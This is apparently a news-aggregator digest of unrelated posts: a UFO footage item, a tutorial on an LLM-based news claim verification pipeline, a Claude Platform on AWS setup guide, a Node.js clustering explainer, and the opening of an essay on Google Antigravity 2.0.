I apply the same standard to my projects. My DOSBox Launcher — a GTK3 desktop app for managing DOS games on Linux — has the AI authorship breakdown documented directly in the README:
That's the line I try to walk with all of this. AI as a tool. AI as an assistant. Not AI as a replacement for thinking.
To put that number in perspective — a freelance developer would charge anywhere from $3,000 to $10,000+ for an application like this. A SaaS alternative would run $50-100/month indefinitely.
I spent fifty cents and an afternoon.
That's not a party trick. That's a fundamental shift in what a single person with domain knowledge and the right tools can accomplish.
I'm a 45-year-old self-taught infrastructure engineer, army veteran, and automotive technician from Texas. I don't have a degree. I don't have a fancy job title. I have 32 years of continuous self-directed learning, a homelab that saves me an estimated $26,000 a year in SaaS costs, and an invoicing application that cost me fifty cents and actually understands how a mechanic's business works.
AI didn't replace my knowledge. It gave my knowledge a power tool.
That's the correct way to use it.

---
## Fighter jet tracks UFO in newly released Pentagon footage

> Published: 2026-05-24 06:18:35+00:00
> Source: http://www.euronews.com/video/2026/05/24/fighter-jet-tracks-ufo-in-newly-released-pentagon-footage
> wpnews: https://wpnews.pro/news/fighter-jet-tracks-ufo-in-newly-released-pentagon-footage

The Pentagon released newly declassified footage showing a fighter jet tracking an unidentified aerial phenomenon (UAP), part of a broader effort to increase transparency around military encounters with UFOs. The videos, which are among the latest batch of previously classified files, depict objects observed by military personnel but offer no evidence of extraterrestrial life.

The Pentagon released another batch of previously classified UFO files, including military videos of unidentified aerial phenomena, saying the material is intended to provide “unprecedented transparency” despite offering no evidence of alien life.

---
## Source Score: Continuing Exploration of LLM Usage in Automated Workflows

> Published: 2026-05-24 06:17:50+00:00
> Source: https://dev.to/semmet/source-score-continuing-exploration-of-llm-usage-in-automated-workflows-eoi
> wpnews: https://wpnews.pro/news/source-score-continuing-exploration-of-llm-usage-in-automated-workflows

The article describes a system that automates the extraction and verification of falsifiable claims from news articles. It uses NewsData.io to fetch the ten newest articles from a source, then employs LLMs via OpenRouter to select the best falsifiable claim, fill in missing summaries, and find independent proofs. The workflow runs weekly using Python scripts, custom OpenRouter skills, and GitHub Actions, ultimately generating pull requests with ready-to-ingest claim and proof files.

TL;DR: I built a weekly pipeline that pulls the ten newest articles from a news outlet, picks the one that actually makes a falsifiable claim, fills in any missing summary, finds two independent proofs, and opens PRs with ready-to-ingest `claims/` and `proofs/` files. All of this runs on a couple of Python scripts, two custom OpenRouter skills, and two GitHub Actions.

In my last post I covered how I automated ingestion of top news sources by combining Firecrawl, the OpenRouter API, and GitHub Actions workflows. In this post I'll implement the same pattern for news source claims and their proofs.

The first challenge I ran into was to figure out a way to fetch recent articles published by a news source. Luckily, I found [NewsData.IO](https://newsdata.io/) which provides an API to search, collect and track worldwide news. The NewsData.io free tier gives me 200 API credits per day, more than enough for a weekly run across 12 sources (*for now at least* 😌).

## 1️⃣ Fetch the latest articles - [newsdata_io.py](https://github.com/SatyaLens/sources/blob/main/scripts/newsdata_io.py)

The first step is to write a thin wrapper around the **NewsData.io** `latest` endpoint. It pulls the **10 most recent articles** for a given domain.

```
import os

import requests

# Free-tier-friendly query params
CATEGORY = "environment,technology,world"
LANGUAGE = "en"
REMOVE_DUPLICATE = "1"
SIZE = "10"
DATATYPE = "news,research,analysis,pressRelease"

NEWSDATA_API_BASE_URL = os.getenv(
    "NEWSDATA_API_BASE_URL", "https://newsdata.io/api/1"
)
NEWSDATA_API_KEY = os.environ["NEWSDATA_API_KEY"]

def get_claims(src_domain_url: str):
    """
    Call the NewsData.io `/latest` endpoint for a specific domain.
    Returns a list of article dicts (or None on error).
    """
    endpoint = f"{NEWSDATA_API_BASE_URL}/latest"
    params = {
        "category": CATEGORY,
        "language": LANGUAGE,
        "removeduplicate": REMOVE_DUPLICATE,
        "size": SIZE,
        "datatype": DATATYPE,
        "apikey": NEWSDATA_API_KEY,
        "domainurl": src_domain_url,
    }
    response = requests.get(endpoint, params=params, timeout=10)
    if response.status_code != 200:
        print(
            f"Error: couldn't fetch claims for {src_domain_url}: {response.status_code}"
        )
        # Show suggestions if the API knows a better domain
        resp_body = response.json()
        if (
            resp_body.get("results") is not None
            and resp_body.get("results")[0].get("suggestion") is not None
        ):
            print(
                f"Suggested domain url(s) for {src_domain_url}: {resp_body['results'][0]['suggestion']}"
            )
        return None
    return response.json()["results"]
```

*Why it matters*: The free tier only gives 200 credits per day, so we keep the request lightweight: single domain, ten results, and a narrow set of categories. The `DATATYPE` filter is intentionally broad; we prune non-falsifiable items later.

## 2️⃣ Filter for a falsifiable claim - the **claim‑verification** skill

Given the way I'm currently calculating scores for a news source, only claims that are falsifiable matter. So out of all the claims returned by NewsData API I'm keeping only one that matches the **falsifiable claim** criteria best.

I'm using LLMs to perform this classification. To be specific, I'm forwarding the array of article objects returned by the NewsData API to the OpenRouter API.

```
[{
"article_id": "40305aa160787297dd3f9cc15faa8637",
"link": "https://www.theguardian.com/us-news/2026/may/22/kansas-bird-nest-truck",
"title": "Federally protected bird’s nest holds up sale of Ford truck in Kansas",
"description": "A robin built a nest on a Ford-F-250’s tire and laid its eggs in it; a law prohibits removing it while inhabited by bird brood A truck sold by a Kansas dealership cannot be taken from the lot by its new owner because a family of robins is living atop one of the vehicle’s tires. The relatively novel situation has gained widespread attention after the dealership in the Kansas community of Olathe wrote about it on its Facebook page – and it perhaps taught many that active robin nests are protected by federal law from the US. Continue reading...",
"keywords": [
"birds",
"kansas",
"wildlife",
"ford",
"animals",
"us news",
"law (us)"
],
"creator": [
"josé olivares"
],
"language": "english",
"country": [
"united states of america"
],
"category": [
"top",
"environment"
],
"datatype": "news",
"pubDate": "2026-05-22 19:03:07",
"pubDateTZ": "UTC",
"fetched_at": "2026-05-22 19:32:47",
"image_url": "https://i.guim.co.uk/img/media/c9e972eb2d494c4a9c713a7b5550f0fa9efcae1f/0_503_1536_1229/master/1536.jpg?width=140&quality=85&auto=format&fit=max&s=ad95c6dcdf71df9bc3461b683effe424",
"video_url": null,
"source_id": "theguardian",
"source_name": "The Guardian",
"source_priority": 106,
"source_url": "https://www.theguardian.com",
"source_icon": "https://n.bytvi.com/theguardian.jpg",
"duplicate": false
}]
```

To help with the classification I wrote an AI **agent skill**. It tells the LLM to:

- **Visit each article URL** with the web-search tool.
- **Detect** whether the article contains a claim that can be objectively proven true or false.
- **Return exactly one** JSON object that matches the criteria.

```
# Adjacent string literals are concatenated as-is, so each sentence ends with a space.
CLAIM_FILTER_PROMPT = (
    "Use web search tool to visit the link for each article, access the content and then assess if it is a falsifiable claim. "
    "Out of these 10 articles, only return 1 article that best fits the falsifiable claim criterion. "
    "Prefer claims that have been made by the news source directly. "
    "Keep the json structure of the claims the same as the original schema in the input. Do not add, remove, or modify any key or value. "
    "Only output the plain json array string that I can safely unmarshal. "
    "Do not format the string. Do not output anything else."
)

req_content = (
    "Following is a list of 10 articles published by the same news outlet. Each article is represented by a json string type element in the array."
    f"\n\n{claims}\n\n"
    f"{CLAIM_FILTER_PROMPT}"
)

filtered_claims = openrouter.req_w_addons(
    req_content, skill=falsifiable_claim_skill, tools=[openrouter.WEB_SEARCH_TOOL]
)
```

*Result*: A single, well‑structured claim with all the fields required to create a claim ingestion doc.
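Since the prompt asks for a plain JSON array with exactly one unmodified article, it can help to check the reply before building an ingestion doc. The following is a minimal sketch of such a check, not the repository's actual code: `parse_single_claim` is a hypothetical helper, and it assumes the model's reply is available as a plain string and that every input article carries an `article_id`, as in the sample above.

```python
import json


def parse_single_claim(raw_response: str, input_claims: list[dict]) -> dict:
    """Parse the model's reply and confirm it is one unmodified input article.

    Hypothetical helper for illustration; raises ValueError on any mismatch.
    """
    text = raw_response.strip()
    # Models sometimes add text around the JSON despite instructions,
    # so keep only the outermost [...] span.
    start, end = text.find("["), text.rfind("]")
    if start == -1 or end < start:
        raise ValueError("no JSON array found in model response")

    claims = json.loads(text[start:end + 1])  # JSONDecodeError is a ValueError
    if len(claims) != 1 or not isinstance(claims[0], dict):
        raise ValueError("expected exactly one JSON object in the array")

    claim = claims[0]
    originals = {c["article_id"]: c for c in input_claims}
    original = originals.get(claim.get("article_id"))
    if original is None:
        raise ValueError("returned article_id is not in the input")
    if claim != original:
        # The prompt forbids adding, removing, or modifying keys and values.
        raise ValueError("model modified the article fields")
    return claim
```

Comparing against the original input, rather than trusting the returned object, means a silently rewritten title or link is rejected instead of being ingested.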

I'm only selecting one claim for now. Once I've verified the stability of the ingestion workflows and the reliability of OpenRouter responses, I'll increase the count and the ingestion frequency.

## 3️⃣ Fill in missing descriptions - a quick summarization pass

NewsData.io sometimes returns `"null"` for the `description` field. When that happens I'm asking **OpenRouter** to summarize the article in under 500 characters.

```
# Adjacent string literals are concatenated as-is, so each sentence ends with a space.
CLAIM_SUMMARY_PROMPT = (
    "Use web search tool to visit the link to the article and access its content. "
    "Summarize the article in under 500 characters. "
    "Return only the summary without any additional text."
)

req_content = (
    "Following is the url to an article published by a news media outlet."
    f"\n\n{claim['link']}\n\n"
    f"{CLAIM_SUMMARY_PROMPT}"
)

claim_summary = openrouter.req_w_addons(
    req_content, tools=[openrouter.WEB_SEARCH_TOOL]
)

claim["description"] = claim_summary
```

Now every claim has a concise, human‑readable description, even when the source API left it blank.
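The decision about when to summarize, and the length limit on the result, can be sketched as two small helpers. This is an illustrative sketch under assumptions: `needs_summary` and `clamp_summary` are hypothetical names, and treating JSON `null`, the literal string `"null"`, and blank strings alike is my assumption about what "missing" means here.

```python
MAX_SUMMARY_CHARS = 499  # "under 500 characters", as the prompt requests


def needs_summary(claim: dict) -> bool:
    """Return True when the description is absent, blank, or a null marker."""
    desc = claim.get("description")
    if desc is None:
        return True
    text = str(desc).strip()
    return text == "" or text.lower() == "null"


def clamp_summary(summary: str, limit: int = MAX_SUMMARY_CHARS) -> str:
    """Collapse whitespace and cut an over-long summary at a word boundary."""
    summary = " ".join(summary.split())
    if len(summary) <= limit:
        return summary
    # Leave room for the "..." marker, then drop the trailing partial word.
    cut = summary[: limit - 3].rsplit(" ", 1)[0]
    return cut + "..."
```

Clamping on the client side is a cheap safeguard, since a model can exceed a length limit stated only in the prompt.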

## 4️⃣ Weekly claim ingestion - GitHub Actions [workflow](https://github.com/SatyaLens/sources/actions/workflows/fetch_ingest_claims.yml)

The whole thing runs on a **GitHub Actions** schedule once a week. The [workflow](https://github.com/SatyaLens/sources/blob/main/.github/workflows/fetch_ingest_claims.yml) checks out the repo, installs dependencies, runs `ingest_claims.py`, and opens a PR.

*Outcome*: A [PR](https://github.com/SatyaLens/sources/pull/49) appears every Sunday with fresh claim documents, ready for review.

## 5️⃣ Fetch proofs - [ingest_proofs.py](https://github.com/SatyaLens/sources/blob/main/scripts/ingest_proofs.py) + [workflow](https://github.com/SatyaLens/sources/blob/main/.github/workflows/fetch_ingest_proofs.yml)

Once a claim has been ingested, I need **proofs** that either support or refute it. The proof‑verification prompt asks the LLM to find **two** independent sources and label each with a boolean `supports_claim`.

To help LLMs search for supporting or refuting proofs for a given claim with the web search tool, I wrote another skill, [claim-verification](https://github.com/semmet95/agent-skills/blob/main/claim-verification/SKILL.md), which does the following:

- **Extracts and validates falsifiable claims**: Takes a URL to a media article/post and identifies the core, testable claim from its content, ensuring it's concrete and can be proven true or false.
- **Performs targeted web searches**: Uses time-aware search queries to find up to two high-quality external documents that directly support or refute the claim, with strict attention to temporal relevance (matching the claim's timeframe).
- **Returns verifiable evidence URLs**: Outputs a JSON array of retrieved URLs with boolean indicators (supports_claim: true/false) showing whether each document confirms or contradicts the original claim, prioritizing official/authoritative sources over opinion pieces.

```
# Adjacent string literals are concatenated as-is, so each sentence ends with a space.
CLAIM_VERIFICATION_PROMPT = (
    "Use web search tool to access the claim link, fetch the content and process it. "
    "Use the web search tool again to look for proofs in the form of official statements, press releases, or reports from reputable sources to prove the claim right or wrong conclusively. "
    "Ensure that the proofs belong to the same timeline as the claim. Do not include outdated sources. "
    "Output links to the 2 sources that prove the claim right or wrong and specify as a boolean whether they support the claim or not. "
    "The output format should be a json array with each element being a json object corresponding to a source supporting or refuting the claim. "
    "Each json element should follow the following schema: {\"uri\": \"string\", \"supports_claim\": boolean}"
)

req_content = (
    "Following is a link to a falsifiable claim by a news media outlet as an article"
    f"\n\n{claim['uri']}\n\n"
    f"{CLAIM_VERIFICATION_PROMPT}"
)

claim_proofs = openrouter.req_w_addons(
    req_content, skill=claim_verification_skill, tools=[openrouter.WEB_SEARCH_TOOL]
)
```
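The schema requested in the prompt above, `{"uri": "string", "supports_claim": boolean}`, can be enforced before any proof document is written. Here is a minimal sketch, assuming the model's reply arrives as a plain string; `parse_proofs` is a hypothetical helper and not part of the repository.

```python
import json
from urllib.parse import urlparse


def parse_proofs(raw_response: str, max_proofs: int = 2) -> list[dict]:
    """Validate the model's proof list against the schema from the prompt.

    Hypothetical helper for illustration; raises ValueError on any violation.
    """
    text = raw_response.strip()
    # Keep only the outermost [...] span in case the model added extra text.
    start, end = text.find("["), text.rfind("]")
    if start == -1 or end < start:
        raise ValueError("no JSON array found in model response")

    items = json.loads(text[start:end + 1])
    if len(items) > max_proofs:
        raise ValueError(f"expected at most {max_proofs} proofs, got {len(items)}")

    proofs = []
    for item in items:
        if not isinstance(item, dict):
            raise ValueError("each proof must be a JSON object")
        uri = item.get("uri")
        supports = item.get("supports_claim")
        if not isinstance(uri, str) or urlparse(uri).scheme not in ("http", "https"):
            raise ValueError(f"invalid uri: {uri!r}")
        # Strict check: the string "true" or the number 1 is not a boolean.
        if not isinstance(supports, bool):
            raise ValueError(f"supports_claim must be a boolean, got {supports!r}")
        proofs.append({"uri": uri, "supports_claim": supports})
    return proofs
```

Rebuilding each proof from only the two expected keys also drops any extra fields the model may have added.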

**Proof workflow**: Just like the claim ingestion workflow, the proof ingestion workflow runs once a week. It runs the `ingest_proofs.py` script, creates the proof documents in a new branch, then opens a PR from that branch to the `main` branch.

*Outcome*: A [PR](https://github.com/SatyaLens/sources/pull/48) appears every Sunday with fresh proof documents for ingested claims, ready for review.

## 6️⃣ OpenRouter reliability improvements

Since my OpenRouter API usage has been increasing, I've shortened my list of free-tier models to the following:

```
FREE_MODELS_DOC = [
    "google/gemma-4-31b-it:free",
    "nvidia/nemotron-3-nano-omni-30b-a3b-reasoning:free",
    "openrouter/free"
]
```

These three models consistently give good results while staying within the free tier.

### Back‑off retry loop ([openrouter.py](https://github.com/SatyaLens/sources/blob/main/scripts/openrouter.py))

I also added incremental delays between retries to reduce the odds of running into server side errors.

```
for i in range(1, OPENROUTER_MAX_RETRIES + 1):
    status, body = helper.post_request(...)
    if status in (0, 429) or 500 <= status < 600:
        print(f"OpenRouter API returned status {status}, retrying...", file=sys.stderr)
        time.sleep(10 * i)
        continue
    # success handling...
```

*Impact*: 500‑error rate dropped dramatically, and weekly API spend stayed well under the free‑tier limits.
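For readers who want to try the retry pattern in isolation, here is a self-contained sketch of the same idea. It is not the code from `openrouter.py`: `request_with_backoff`, `MAX_RETRIES`, and the injected `send` and `sleep` callables are hypothetical, and reading status `0` as "no HTTP response at all" is my assumption about the helper. The delay grows linearly (10 s, 20 s, 30 s, ...), matching `time.sleep(10 * i)` above.

```python
import sys
import time

MAX_RETRIES = 5          # hypothetical stand-in for OPENROUTER_MAX_RETRIES
BASE_DELAY_SECONDS = 10  # same base delay as the snippet above


def is_retryable(status: int) -> bool:
    """Retry on transport failure (0, assumed), rate limiting (429), and 5xx."""
    return status in (0, 429) or 500 <= status < 600


def request_with_backoff(send, max_retries=MAX_RETRIES,
                         base_delay=BASE_DELAY_SECONDS, sleep=time.sleep):
    """Call send() until it returns a non-retryable status.

    send must return a (status, body) tuple. sleep is injectable so the
    loop can be tested without waiting.
    """
    last_status = None
    for attempt in range(1, max_retries + 1):
        status, body = send()
        if not is_retryable(status):
            return status, body
        last_status = status
        print(f"status {status}, attempt {attempt}/{max_retries}", file=sys.stderr)
        if attempt < max_retries:
            sleep(base_delay * attempt)  # linear back-off: 10s, 20s, 30s, ...
    raise RuntimeError(
        f"giving up after {max_retries} attempts (last status {last_status})"
    )
```

Raising after the final attempt, rather than falling out of the loop silently, lets the workflow fail visibly instead of continuing with no response.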

I really like this OpenRouter dashboard btw.

## 7️⃣ Trade‑offs & limitations

| Aspect | Trade‑off |
|---|---|
| Free‑tier limits | 200 NewsData.io credits/day restricts us to a single domain p

---
## Tried using the Claude Platform on AWS

> Published: 2026-05-24 06:15:34+00:00
> Source: https://dev.to/aws-builders/tried-using-the-claude-platform-on-aws-4dob
> wpnews: https://wpnews.pro/news/tried-using-the-claude-platform-on-aws

The Claude Platform on AWS is now generally available, allowing users to access Anthropic's native Claude API directly through their AWS account with integrated IAM authentication, AWS billing, and CloudTrail auditing. New features released by Anthropic become available on AWS the same day, and inference runs on Anthropic's infrastructure outside AWS's security boundary. The setup process involves creating a workspace in the AWS Management Console, generating an API key, and configuring environment variables to start using the API.

The Claude platform on AWS is now generally available.
This will allow you to access Claude, Anthropic's native platform, directly through your AWS account.
1. Use Anthropic’s official Claude API directly with your AWS account
Claude Platform on AWS is a new offering that allows you to use Anthropic’s native Claude API—operated by Anthropic—seamlessly integrated with AWS IAM authentication, AWS billing, and CloudTrail auditing.
2. Immediate access to the latest features (full functionality, full speed)
New features released by Anthropic become available on AWS the same day.
3. Inference runs on Anthropic infrastructure
Since Claude Platform on AWS is operated by Anthropic, inference runs outside AWS’s security boundary.
Open the “Claude Platform on AWS” page in the AWS Management Console and click “Get Started.”
Click “Continue.”
Enter your email address and click “Start.”
You will receive an email from Anthropic titled “Set up your Claude organization.” Click the link.
Enter your organization details and click “Complete setup.”
Click “Create Workspace.”
Your workspace will be created. Make sure to note the workspace ID.
Select the “Admin” role and sign in.
Claude Console will open.
Let’s take a look at some of the available features.
You can register and manage agent skills.
You can create and manage agents.
You can monitor token usage and costs.
You can view rate limits and manage data residency.
Generate an API key from the dashboard.
Set an expiration date and generate the key.
Make sure to save the generated API key.
On the “Claude Platform on AWS” page, you can create and manage API keys under “API Keys.”
Set your environment variables:
export AWS_REGION="us-east-1"
export ANTHROPIC_WORKSPACE_ID="wrkspc_xxxxx"
export CLAUDE_AWS_BASE_URL="https://aws-external-anthropic.${AWS_REGION}.api.aws"
export ANTHROPIC_API_KEY="xxxxx"
Try asking what Amazon Bedrock is.
curl "https://aws-external-anthropic.us-east-1.api.aws/v1/messages" \
-H "x-api-key: $ANTHROPIC_API_KEY" \
-H "x-amz-security-token: $AWS_SESSION_TOKEN" \
-H "content-type: application/json" \
-H "anthropic-version: 2023-06-01" \
-H "anthropic-workspace-id: $ANTHROPIC_WORKSPACE_ID" \
-d '{
"model": "claude-sonnet-4-6",
"max_tokens": 1024,
"messages": [
{"role": "user", "content": "What is Amazon Bedrock?"}
]
}'
If you receive a response like the one below, it’s working correctly:
{
"model": "claude-sonnet-4-6",
"id": "msg_xxxxx",
"type": "message",
"role": "assistant",
"content": [
{
"type": "text",
"text": "# Amazon Bedrockとは\n\nAmazon Bedrockは、**AWSが提供する完全マネージド型の生成AIサービス**です。\n\n---\n\n## 主な特徴\n\n### 🤖 複数の基盤モデル（Foundation Models）へのアクセス\n様々なAIプロバイダーのモデルを一つのAPIで利 用できます：\n\n| プロバイダー | モデル例 |\n|------------|---------|\n| Amazon | Amazon Titan |\n| Anthropic | Claude 3.5など |\n| Meta | Llama 3など |\n| Mistral AI | Mistral / Mixtralなど |\n| Stability AI | Stable Diffusionなど |\n\n---\n\n## 主な機能\n\n- **テキスト生成** - 文章作成、要約、翻訳など\n- **画像生成** - テキストから画像を生成\n- **RAG（検索拡張生成）** - 独自データと組み合わせた回答生成\n- **AIエージェント** - 複雑なタスクの自動化\n- **Fine-tuning** - 独自データでモデルをカスタマイズ\n\n---\n\n## メリット\n\n✅ **サーバーレス** - インフラ管理不要 \n✅ **セキュリティ** - データはAWS内で保護 \n✅ **スケーラビリティ** - 需要に応じて自動スケール \n✅ **コスト効率** - 使った分だけ支払い\n\n---\n\n## ユースケース例\n\n- チャットボット・カスタマーサポート\n- ドキュメント分析・要約\n- コード生成\n- コンテンツ作成\n\nAWSのエコシステム（S3、Lambda等）と連携しやすいのも大きな利点です。\n\n何か具体的に知りたい点はありますか？"
}
],
"stop_reason": "end_turn",
"stop_sequence": null,
"stop_details": null,
"usage": {
"input_tokens": 18,
"cache_creation_input_tokens": 0,
"cache_read_input_tokens": 0,
"cache_creation": {
"ephemeral_5m_input_tokens": 0,
"ephemeral_1h_input_tokens": 0
},
"output_tokens": 527,
"service_tier": "standard",
"inference_geo": "global"
}
}
Being able to use the latest native Claude features directly with your AWS account is surprisingly smooth, and the setup is incredibly simple.
This greatly expands the range of development possibilities.
Since inference runs on Anthropic’s side, it’s important to choose between Bedrock and Claude Platform on AWS depending on your use case.
It’s a good idea to become comfortable using Claude in various patterns.

---
## Your Node.js Server is Using Just One CPU. Here's How to Fix It.

> Published: 2026-05-24 06:10:34+00:00
> Source: https://dev.to/blackwatch021/your-nodejs-server-is-using-just-one-cpu-heres-how-to-fix-it-4ee
> wpnews: https://wpnews.pro/news/your-node-js-server-is-using-just-one-cpu-here-s-how-to-fix-it

The article explains that Node.js runs on a single thread, meaning a deployed application only utilizes one vCPU at a time, leaving additional vCPUs idle. It introduces clustering as a solution, which spawns multiple worker processes to utilize all available CPU cores, and provides a code example using Node's native `cluster` and `os` modules. The article also addresses challenges with stateful connections like WebSockets, noting that workers cannot share in-memory data, which requires solutions like sticky sessions or external data stores.

## CLUSTERING

You created your node application, it's ready, you have chosen an 8 vCPU instance to deploy it. You are done with deployment. Everything is working fine, but unknowingly you aren't using the full potential of the deployment. We know that node.js runs on a SINGLE THREAD, which means our node application uses only one vCPU at a time — but you took an 8 vCPU instance, so aren't the other 7 vCPUs sitting there idle?

The solution for this is CLUSTERING. It's a concept of running multiple instances of an application, where each works as an individual entity but still gets the work done and runs on the same port. Now the question is — how will this work? Isn't it going to cause issues among the instances? The simple and short answer is no.

## HOW IT WORKS

When clustering is done, we end up with multiple processes. There are two kinds:

- Primary – There is only one primary. It is responsible for spinning up the worker processes, managing them, and if any one of them dies, spawning it back. The primary is there only to manage — it doesn't run the code (connecting with db, spinning up server, etc.) Note – If the primary is down, the entire cluster will crash.
- Workers – These are the actual instances where the application runs — they serve the users.

**Key Facts**

- Since there are 8 vCPUs in our case, there will be 9 total processes — 1 primary + 8 workers.
- Each worker has its own memory – nothing is shared among workers.
- Workers share a single port – connections are distributed across them.
- Primary is intentionally dumb – it never runs application code or connects to the DB.
- Workers can't see their siblings — for each worker, only itself exists.

**CODE SNIPPET**

``` js
import cluster from "node:cluster";
import os from "node:os";
import app from "./src/app";
import { connectDB } from "./src/config/database";
import { createServer } from "http";

const PORT = process.env.PORT || 3000;
const enableCluster = process.env.NODE_ENV === "development";

if (enableCluster && cluster.isPrimary) {
  const numWorkers = os.cpus().length;
  for (let i = 0; i < numWorkers; i++) cluster.fork();

  cluster.on("exit", (worker) => {
    console.log(`worker ${worker.process.pid} died — respawning`);
    cluster.fork();
  });
} else {
  const httpServer = createServer(app);
  connectDB().then(() => httpServer.listen(PORT));
}
```

**EXPLANATION OF CODE**

In production we generally use services like pm2 to manage clustering, but here we are doing it using native options. For that, we first need the cluster and os modules of node.

Then we check if the current process is the primary or not. If it is the primary, we spawn new workers as per the number of cores available — it's not hard coded, we may change it as per our convenience, but it should not be more than the number of cores/vCPUs. If it isn't the primary (meaning we are already inside a worker), we run the actual backend code — connecting to the DB and starting the server. So now we have 8 worker instances up and running (plus the primary watching over them).

Using process.pid, we can see the unique id of each worker.

Note – this id, and whatever happens inside an instance, stays there only. Other instances can't access this one's data, process, etc.

**PROS/CONS**

Pros:

- Uses all CPU cores
- Crash isolation
- Built into Node
- Higher throughput for CPU-bound work
- Auto-respawns dead workers

Cons:

- Each worker has its own RAM (no shared state)
- In-memory caches/sessions break silently
- WebSockets/SSE need extra infrastructure
- Harder to debug – 'which worker logged that?'
- Primary crash = whole cluster dies

*Note – load balancing is round-robin on Linux; on Windows, the OS decides routing.*

## BIG CAVEAT

This much is enough for simple clustering or for learning purposes, as long as our app is using stateless data (REST APIs backed by a DB).

In this case, the DB is the source of truth. Workers don't need to know about each other. Any worker can serve any request.

**STATEFUL connections (WebSocket)**

*Prerequisite — knowledge of websockets.*

Now things change. Once a connection is established and the HTTP request is upgraded to a WebSocket, the socket connection details (which user is on which socket) are stored in memory, inside that worker. So if User A connects through Worker 1 and User B connects through Worker 2, both are logged in and both users' data is stored in the DB. But the live sockets sit on different workers. Now when A sends a message to B, Worker 1 tries to push it to B's socket — but B's socket lives in Worker 2's memory, not Worker 1's. So the message gets saved to the DB, but real-time delivery to B fails.

Also, workers are standalone, so they can't even talk to each other to ask "do you have this user with you?"

A TCP socket lives inside one process.

**STICKY Session**

Imagine a user lands on Worker A and creates a socket connection. Details regarding the session are stored in Worker A's memory. Somehow, on the next request, the user is shifted to Worker B. Now the user tries to continue the conversation. The worker checks if this session exists or not, but there is no record of it in Worker B (that detail lives in Worker A). So the interaction fails.

To make it easier to picture, here are two ways to think about it:

*Analogy 1* (hotel front desk) — You check into Hotel A. The front desk writes your name against Room 204. Later, you walk into Hotel B and ask for your room key. Hotel B has no idea who you are, because your check-in details only exist at Hotel A's front desk.

*Analogy 2* (locker at a station) — You drop your bag at locker #5 in Station A and get a ticket. Later, you go to Station B and try to use the same ticket. Station B has no locker matching that ticket, because the bag is sitting back in Station A.

To mitigate this issue, we need Sticky Sessions. It ensures that a user stays on a single worker only — pinning all of one client's requests to the same worker.

*One more thing worth knowing* — Socket.IO's connection handshake itself is made of multiple HTTP requests (long-polling fallback) before it upgrades to WebSocket. Without stickiness, those handshake requests can scatter across different workers, and the connection never even establishes. So sticky sessions are needed not just after the user is connected, but during the initial connection itself.

**REDIS ADAPTER for SOCKET**

Even with stickiness, workers still can't communicate with each other. So User A on Worker 1 has no way to push a message to User B sitting on Worker 2. This is a major issue in applications using sockets or real-time communication. To solve this, we have adapters — one of them is the Redis adapter for Socket.IO. It acts as a coordination layer on pub/sub. With this in place, when Worker 1 emits a message, the adapter publishes that emit to a shared bus (Redis). Every worker is subscribed to this bus, and the worker that actually owns B's socket picks it up and delivers the message locally. Now the application will work just like an application running on a single instance.

**STICKY + ADAPTER**

The two solve different problems, and you actually need both together.

- Sticky sessions make sure a user's requests always land on the same worker, so the connection (and the handshake) never breaks mid-way.
- The Redis adapter makes sure that when a worker needs to push a message to a user sitting on a different worker, the message can still reach them through the shared pub/sub bus.

Sticky alone — your user stays connected, but messages between users on different workers still don't reach. Adapter alone — workers can broadcast across each other, but the initial connection itself keeps breaking. Together — your clustered app behaves like a single instance from the user's perspective.

*TL;DR*

Node is single-threaded. Clustering spawns one worker per core. REST scales for free because the DB is shared. Sockets don't — connections live in one worker's RAM. Fix with sticky sessions (so handshakes complete) plus a pub/sub adapter (so workers can deliver each other's messages).

So this sums up basic clustering in a node.js application.

Thanks for reading.

---
## 🚀 Google Antigravity 2.0 Quietly Changes What It Means to Be a Software Engineer

> Published: 2026-05-24 06:08:55+00:00
> Source: https://dev.to/mohamednizzad/google-antigravity-20-quietly-changes-what-it-means-to-be-a-software-engineer-jke
> wpnews: https://wpnews.pro/news/google-antigravity-2-0-quietly-changes-what-it-means-to-be-a-software-engineer

At Google I/O 2026, Google introduced Antigravity 2.0, a platform expansion powered by Gemini 3.5 Flash that shifts software engineering from writing code line-by-line to orchestrating intelligent agents. The system allows developers to define goals and constraints while specialized subagents execute tasks in parallel, fundamentally changing the developer's role from producer to director. This represents a significant conceptual shift in software engineering, comparable to the impact of cloud computing on infrastructure.

*This is a submission for the Google I/O 2026 Writing Challenge*

## Google Antigravity 2.0 Quietly Changes What It Means to Be a Software Engineer

*The most important lesson from Google I/O 2026 isn't that AI writes more code. It's that developers are being asked to manage intelligence instead of producing software line by line.*

## Table of Contents

- [The Day I Realized We Were Asking the Wrong Question](#wrong-question)
- [1️⃣ What Google Actually Announced](#what-announced)
- [2️⃣ Why Everyone Is Focusing on the Wrong Thing](#wrong-thing)
- [3️⃣ The Developer-to-Director Shift](#director-shift)
- [4️⃣ What Makes Antigravity 2.0 Different?](#what-different)
- [5️⃣ I Tested the New Mental Model](#hands-on)
- [6️⃣ Why Orchestration Matters More Than Velocity](#orchestration)
- [7️⃣ What Legal AI Taught Me About Agents](#legal-ai)
- [8️⃣ Risks Nobody Is Talking About Enough](#risks)
- [9️⃣ The Competitive Landscape](#competitive)
- [🔟 Predictions for the Next Three Years](#predictions)
- [Key Takeaways](#takeaways)
- [Further Reading & References](#reference)
- [Conclusion](#conclusion)

## The Day I Realized We Are Asking the Wrong Question

For the last three years, the dominant conversation around AI-assisted development has revolved around one question:

"How much faster can AI help me write code?"

[Google I/O 2026](https://io.google/2026/) convinced me we have been asking the wrong question entirely.

After watching the [Antigravity 2.0 announcements](https://www.youtube.com/watch?v=T_fnhr5lVBw) and spending time understanding the architecture behind them, I came away with a single, clarifying conclusion:

**The most important shift is not that AI can write more code. It's that developers are increasingly becoming directors of intelligent systems rather than authors of every implementation detail.**

That distinction sounds subtle. I don't think it is.

I believe it represents one of the most significant conceptual changes in software engineering since cloud computing transformed how we think about infrastructure. And it was hiding in plain sight inside what most coverage described as "a new coding tool."

This article explores why — and what it means for anyone building software today.

## 1️⃣ What Google Actually Announced

At [Google I/O 2026](https://io.google/2026/), Google introduced [Antigravity 2.0](https://antigravity.google/product/antigravity-2) — not as an incremental IDE upgrade, but as a full platform expansion with five surfaces shipped simultaneously.

| Surface | What It Does |
|---|---|
| Desktop app | Standalone app for managing and orchestrating agents - no IDE required |
| CLI (`agy`) | Terminal-native, same agent harness as the desktop, built in Go |
| SDK | Primitives for building custom agents on Google's coding infrastructure |
| API | Agent orchestration embedded directly into your own applications |
| | Vertex AI evolved - governance, session memory, centralized controls |

